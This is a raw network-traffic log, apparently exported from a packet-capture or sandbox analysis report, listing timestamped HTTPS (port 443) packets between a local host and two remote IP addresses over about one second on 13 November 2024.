                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.798557043 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.798590899 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.798660994 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.798728943 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.799062014 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.799068928 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.799154043 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.799165010 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.805628061 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.805664062 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.805706978 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.805726051 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.805759907 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.805924892 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.805954933 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.805977106 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.805984020 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.806030989 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.806435108 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.806516886 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.806523085 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.806569099 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.806804895 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.806888103 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.806895018 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.807419062 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.807481050 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.807490110 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.807893038 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.807966948 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.807974100 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.808253050 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.808315039 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.808321953 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.808892012 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.808964968 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.808973074 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.809092045 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.809143066 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.809149981 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.812115908 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.812181950 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.812191963 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.812338114 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.812407970 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.812414885 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.812732935 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.812791109 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.812798023 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.812903881 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.812963963 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.812969923 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.812994957 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.813047886 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.813055038 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.830899954 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.830997944 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.831012011 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.831053019 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.831118107 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.831125975 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.831633091 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.831715107 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.831726074 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.832000971 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.832082987 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.832089901 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.832207918 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.832266092 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.832273006 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.832448006 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.832515955 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.832521915 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.839343071 CET44349724184.28.90.27192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.879643917 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.879659891 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.921631098 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.921644926 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.921726942 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.921741009 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.921870947 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.921879053 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.921904087 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.921928883 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.921936989 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.921972036 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.921978951 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.921986103 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.922005892 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.922066927 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.922074080 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.922161102 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.922209024 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.922229052 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.922256947 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.922264099 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.922290087 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.922435999 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.922489882 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.922496080 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.929435015 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.929503918 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.929510117 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.929522038 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.929563046 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.929589987 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.929613113 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.929620981 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.929656982 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.929842949 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.929899931 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.929904938 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.929956913 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.930094004 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.930146933 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.930146933 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.930157900 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.930206060 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.930211067 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.930447102 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.930502892 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.930509090 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.930949926 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.930989027 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.931013107 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.931019068 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.931046963 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.931071997 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.931078911 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.931102991 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.931674957 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.931745052 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.931750059 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.931790113 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.931842089 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.931848049 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.931895018 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.931948900 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.931955099 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.932377100 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.932415009 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.932436943 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.932444096 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.932487011 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.932800055 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.932873964 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.932878971 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.932923079 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.933043957 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.933103085 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.933106899 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.933115005 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.933167934 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.933173895 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.933674097 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.933728933 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.933734894 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.933851957 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.933895111 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.933916092 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.933921099 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.933954954 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.933958054 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.933965921 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.934015036 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.934021950 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.934072018 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.934618950 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.934674025 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.934679985 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.934895039 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.934945107 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.934956074 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.934961081 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.935003996 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.935009003 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.935060024 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.935534000 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.935578108 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.935609102 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.935614109 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.935632944 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.935657024 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.935705900 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.935708046 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.935947895 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.936064959 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.936079025 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.941759109 CET49753443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.941836119 CET44349753162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.941950083 CET49753443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.942222118 CET49755443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.942241907 CET44349755162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.942329884 CET49755443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.942452908 CET49753443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.942485094 CET44349753162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.943046093 CET49755443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.943073988 CET44349755162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.021723032 CET44349726162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.022232056 CET44349725162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.024671078 CET44349727162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.024888039 CET49725443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.024921894 CET44349725162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.025342941 CET49726443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.025389910 CET44349725162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.025407076 CET44349726162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.025616884 CET49727443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.025630951 CET44349727162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.025758028 CET44349726162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.025875092 CET49725443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.025964022 CET44349725162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.026119947 CET49726443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.026194096 CET44349726162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.026257992 CET49725443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.026374102 CET49726443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.026544094 CET44349727162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.026638985 CET49727443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.026875973 CET49727443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.026951075 CET44349727162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.029062033 CET49727443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.029078007 CET44349727162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.036298990 CET44349724184.28.90.27192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.036360979 CET44349724184.28.90.27192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.036459923 CET49724443192.168.2.17184.28.90.27
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.040446997 CET49724443192.168.2.17184.28.90.27
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.040478945 CET44349724184.28.90.27192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.040597916 CET49724443192.168.2.17184.28.90.27
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.040612936 CET44349724184.28.90.27192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.043711901 CET44349728162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.046061039 CET49728443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.046077013 CET44349728162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.046946049 CET44349728162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.047017097 CET49728443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.047935009 CET49728443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.047991037 CET44349728162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.048043966 CET49728443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.067338943 CET44349726162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.069639921 CET49727443192.168.2.17162.241.85.172
